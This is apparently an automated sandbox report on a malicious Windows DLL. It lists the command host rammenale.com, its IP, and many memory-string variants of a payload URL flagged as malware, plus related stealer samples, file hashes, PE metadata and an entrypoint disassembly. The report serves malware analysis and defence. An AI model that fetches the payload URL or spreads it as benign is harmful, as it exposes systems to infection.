Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
rammenale.com
131.153.206.231
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://rammenale.com/for2/zetaq.txttrue
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.fontbureau.com/designersGrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://rammenale.com/for2/zetaq.txtZrundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://www.fontbureau.com/designers/?rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.founder.com.cn/cn/bTherundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://rammenale.com/for2/zetaq.txtVrundll32.exe, 00000008.00000002.2939436401.0000000008972000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/zetaq/ts/rundll32.exe, 00000005.00000002.2939087416.0000000004B9A000.00000004.00000800.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://www.fontbureau.com/designers?rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://rammenale.com/for2/zetaq.txtC:rundll32.exe, 00000003.00000002.1721988527.0000000003230000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1722847273.0000000003170000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2937582224.0000000002940000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2937723951.0000000002A60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2937794002.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2937581731.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2937583525.0000000002A80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2937725359.0000000002B20000.00000004.00000020.00020000.00000000.sdmptrue
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/zetaq.txtLrundll32.exe, 00000006.00000002.2940217585.000000000881C000.00000004.00000020.00020000.00000000.sdmptrue
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
http://www.tiro.comrundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://rammenale.com/for2/zetaq.txtKrundll32.exe, 00000008.00000002.2937725359.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2937725359.0000000002B99000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/zetaq.txtsC:loaddll32.exe, 00000000.00000002.1751507131.0000000000FC0000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://www.fontbureau.com/designersrundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://rammenale.com/for2/zetaq.txtGrundll32.exe, 00000006.00000002.2937794002.0000000003058000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://www.goodfont.co.krrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://rammenale.com/for2/zetaq.txtP$rundll32.exe, 00000006.00000002.2937651056.0000000002E70000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/zetaq.txtErundll32.exe, 00000005.00000002.2940012348.0000000008BA5000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/zetaq.txtDrundll32.exe, 00000005.00000002.2940012348.0000000008BA5000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://www.sajatypeworks.comrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1717234700.00000000050AB000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.typography.netDrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.founder.com.cn/cn/cTherundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.galapagosdesign.com/staff/dennis.htmrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://rammenale.com/for2/zetaq.txtzrundll32.exe, 00000005.00000002.2940012348.0000000008B76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2940012348.0000000008B63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2937723951.0000000002A6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.0000000008876000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.000000000887D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2937725359.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.00000000089BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmptrue
    		unknown
    https://rammenale.com/for2/zetaq.txtwrundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/zetaq.txtvrundll32.exe, 00000005.00000002.2940012348.0000000008BA5000.00000004.00000020.00020000.00000000.sdmptrue
      		unknown
      https://rammenale.com/for2/zetaq.txttrundll32.exe, 00000006.00000002.2937794002.0000000002FAA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/zetaq.txt6634-1002rundll32.exe, 00000005.00000002.2940012348.0000000008B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.000000000881C000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/zetaq.txtrrundll32.exe, 00000006.00000002.2937794002.0000000003058000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/urundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://rammenale.com/for2/zetaqrundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmptrue
      • 2%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/zetaq.txtnrundll32.exe, 00000008.00000002.2937725359.0000000002B2A000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://www.galapagosdesign.com/DPleaserundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://rammenale.com/for2/zetaq.txtlrundll32.exe, 00000006.00000002.2940217585.000000000887D000.00000004.00000020.00020000.00000000.sdmptrue
        		unknown
        https://rammenale.com/for2/zetaq.txtkrundll32.exe, 00000005.00000002.2937723951.0000000002ADE000.00000004.00000020.00020000.00000000.sdmptrue
          		unknown
          http://www.fonts.comrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.sandoll.co.krrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://rammenale.com/for2/zetaq.txtent-1002rundll32.exe, 00000008.00000002.2939436401.0000000008972000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          		unknown
          http://www.urwpp.deDPleaserundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://rammenale.com/for2/zetaq.txtgrundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmptrue
            		unknown
            http://www.zhongyicts.com.cnrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.sakkal.comrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://rammenale.com/for2/zetaq.txtcrundll32.exe, 00000008.00000002.2937725359.0000000002B99000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txtI%rundll32.exe, 00000006.00000002.2937794002.0000000002FAA000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txtxtrundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/rundll32.exe, 00000005.00000002.2940012348.0000000008B63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.000000000881C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.0000000008838000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.0000000008972000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmptrue
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.fontbureau.comrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://rammenale.com/YSTEM32rundll32.exe, 00000008.00000002.2939436401.0000000008972000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://microsoft.corundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://rammenale.com/for2/zetaq.txtPfrundll32.exe, 00000008.00000002.2937725359.0000000002B2A000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://www.microsoft.rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://en.wikipediarundll32.exe, 00000006.00000003.1723075107.00000000050C7000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1723013012.00000000050C6000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://rammenale.com/Datarundll32.exe, 00000006.00000002.2940217585.000000000881C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://rammenale.com/for2/zetaq.txt4Urundll32.exe, 00000005.00000002.2940012348.0000000008B63000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txt50rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txtentndowsINetCookies;rundll32.exe, 00000005.00000002.2937723951.0000000002ADE000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://www.carterandcone.comlrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://rammenale.com/for2/zetaq.txt~rundll32.exe, 00000006.00000002.2940217585.000000000884D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://www.fontbureau.com/designers/cabarga.htmlNrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://rammenale.com/for2/zetaq.txtenturundll32.exe, 00000008.00000002.2937725359.0000000002B99000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://www.founder.com.cn/cnrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.fontbureau.com/designers/frere-user.htmlrundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://rammenale.com/for2/zetaq.txt8rundll32.exe, 00000005.00000002.2937723951.0000000002A6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.000000000887D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txt4Yrundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/fo10280/zet2rundll32.exe, 00000008.00000002.2937478623.00000000027B7000.00000004.00000010.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://rammenale.com/for2/zetaq.txt6rundll32.exe, 00000005.00000002.2937723951.0000000002ADE000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/8EEF8FF4BF719EAB539B52rundll32.exe, 00000005.00000002.2940012348.0000000008B34000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://rammenale.com/for2/zetaq.txt4rundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txtesrundll32.exe, 00000008.00000002.2937725359.0000000002B2A000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaqtxtrundll32.exe, 00000005.00000002.2937473872.0000000002577000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2937480440.0000000002C77000.00000004.00000010.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://www.jiyu-kobo.co.jp/rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://rammenale.com/for2/zetaq.txt.rundll32.exe, 00000006.00000002.2940217585.0000000008834000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://www.fontbureau.com/designers8rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://rammenale.com/for2/zetaq.txt4mrundll32.exe, 00000005.00000002.2940012348.0000000008B63000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txtentrundll32.exe, 00000005.00000002.2937723951.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2937794002.000000000301F000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txt&rundll32.exe, 00000008.00000002.2939436401.0000000008972000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaqonts/crundll32.exe, 00000006.00000002.2939550917.00000000050C6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txt#rundll32.exe, 00000006.00000002.2940217585.000000000887D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txt4errundll32.exe, 00000008.00000002.2939436401.00000000089BD000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq.txt4qrundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/zetaq/arundll32.exe, 00000005.00000002.2939087416.0000000004B9A000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            131.153.206.231
            		rammenale.comUnited States
            		19437SS-ASHUStrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1500942
            Start date and time:2024-08-29 06:52:05 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 37s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:13
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:UiFttnkl2R.dll
            renamed because original name is a hash value
            Original Sample Name:d0c554c836f955997316acf30b5039b52e5c9a8b127a5f33107314a481663b5e.dll
            Detection:MAL
            Classification:mal80.evad.winDLL@14/0@1/1
            EGA Information:
            • Successful, ratio: 66.7%
            HCA Information:
            • Successful, ratio: 92%
            • Number of executed functions: 14
            • Number of non-executed functions: 63
            Cookbook Comments:
            • Found application associated with file extension: .dll

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target rundll32.exe, PID 7432 because there are no executed function
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            00:53:00API Interceptor2x Sleep call for process: rundll32.exe modified
            00:53:03API Interceptor1x Sleep call for process: loaddll32.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            131.153.206.231Dll1.dllGet hashmaliciousUnknownBrowse
              Dll1.dllGet hashmaliciousUnknownBrowse

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                rammenale.comDll1.dllGet hashmaliciousUnknownBrowse
                • 131.153.206.231
                Dll1.dllGet hashmaliciousUnknownBrowse
                • 131.153.206.231

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                SS-ASHUSDll1.dllGet hashmaliciousUnknownBrowse
                • 131.153.206.231
                Dll1.dllGet hashmaliciousUnknownBrowse
                • 131.153.206.231
                https://blockchainsolution.netlify.app/Get hashmaliciousUnknownBrowse
                • 131.153.206.100
                http://blockdag-network-rectification.pages.dev/wallet/inputs.html/js/aes.jsGet hashmaliciousUnknownBrowse
                • 131.153.206.103
                [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.emlGet hashmaliciousUnknownBrowse
                • 131.153.100.38
                Bank Slip.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 131.153.147.106
                Fatura20240617.exeGet hashmaliciousFormBookBrowse
                • 131.153.148.82
                0tkRwEewXq.exeGet hashmaliciousFormBookBrowse
                • 131.153.170.234
                CMgd5ZVG2N.elfGet hashmaliciousUnknownBrowse
                • 209.100.21.94
                CMV610942X6UI.exeGet hashmaliciousFormBookBrowse
                • 131.153.148.82

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, VidarBrowse
                • 131.153.206.231
                rSHIPMENT_DOCMSS24071327.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 131.153.206.231
                file.exeGet hashmaliciousLummaC, VidarBrowse
                • 131.153.206.231
                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                • 131.153.206.231
                Dll1.dllGet hashmaliciousUnknownBrowse
                • 131.153.206.231
                Dll1.dllGet hashmaliciousUnknownBrowse
                • 131.153.206.231
                file.exeGet hashmaliciousLummaC, VidarBrowse
                • 131.153.206.231
                x64_installer__v4.5.6.msiGet hashmaliciousUnknownBrowse
                • 131.153.206.231
                Ad#U043ebe_Activator.exeGet hashmaliciousLummaCBrowse
                • 131.153.206.231
                file.exeGet hashmaliciousMeduza StealerBrowse
                • 131.153.206.231

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.5356756294820855
                TrID:
                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                • Generic Win/DOS Executable (2004/3) 0.20%
                • DOS Executable Generic (2002/1) 0.20%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:UiFttnkl2R.dll
                File size:147'456 bytes
                MD5:8620a8a3f75b8b63766bd0f489f33d6a
                SHA1:ffe90dfdfbb5d7d33392887b2a3995cbfba2aae8
                SHA256:d0c554c836f955997316acf30b5039b52e5c9a8b127a5f33107314a481663b5e
                SHA512:57efc2cf168964bef5919ce9534a4123aa7cbc891e34ca0919f0b939596252f6657ee127aa5daf5cb5652b141536649f37e5dba269d88f5d71098823c8babaef
                SSDEEP:3072:hI/BdPh3InCF62EHwrSqzaAyy7hHFlBzKCJ/6Pcf+dG0n3:hI/7DF626wr7yiFlBDE1n3
                TLSH:BFE37C06B581C032C56E29350570DB726B7FBD30DF64AD8F77980A7A9F702C18F25A6A
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........byN.............{.......{.......{.......{...............................{..............................................Rich...

                File Icon

                Icon Hash:7ae282899bbab082

                Static PE Info

                General

                Entrypoint:0x100030d9
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x10000000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x665963AE [Fri May 31 05:44:14 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:28e52b50e791e98ac4872f0f813b58e6

                Entrypoint Preview

                Instruction
                push ebp
                mov ebp, esp
                cmp dword ptr [ebp+0Ch], 01h
                jne 00007FF84CBBF8A7h
                call 00007FF84CBBFA7Bh
                push dword ptr [ebp+10h]
                push dword ptr [ebp+0Ch]
                push dword ptr [ebp+08h]
                call 00007FF84CBBF753h
                add esp, 0Ch
                pop ebp
                retn 000Ch
                int3
                int3
                int3
                int3
                push ecx
                lea ecx, dword ptr [esp+08h]
                sub ecx, eax
                and ecx, 0Fh
                add eax, ecx
                sbb ecx, ecx
                or eax, ecx
                pop ecx
                jmp 00007FF84CBBFF7Fh
                push ecx
                lea ecx, dword ptr [esp+08h]
                sub ecx, eax
                and ecx, 07h
                add eax, ecx
                sbb ecx, ecx
                or eax, ecx
                pop ecx
                jmp 00007FF84CBBFF69h
                push ebp
                mov ebp, esp
                push 00000000h
                call dword ptr [1001B058h]
                push dword ptr [ebp+08h]
                call dword ptr [1001B054h]
                push C0000409h
                call dword ptr [1001B05Ch]
                push eax
                call dword ptr [1001B030h]
                pop ebp
                ret
                push ebp
                mov ebp, esp
                sub esp, 00000324h
                push 00000017h
                call dword ptr [1001B060h]
                test eax, eax
                je 00007FF84CBBF8A7h
                push 00000002h
                pop ecx
                int 29h
                mov dword ptr [10023B30h], eax
                mov dword ptr [10023B2Ch], ecx
                mov dword ptr [10023B28h], edx
                mov dword ptr [10023B24h], ebx
                mov dword ptr [10023B20h], esi
                mov dword ptr [10023B1Ch], edi
                mov word ptr [10023B48h], ss
                mov word ptr [10023B3Ch], cs
                mov word ptr [eax], es

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x226700x50.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x226c00x50.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x1b0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x260000x1328.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x214900x38.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x213d00x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x154.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x1984b0x19a002ed7238e48956e40b8639975a6f91143False0.583812881097561data6.664185453974053IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
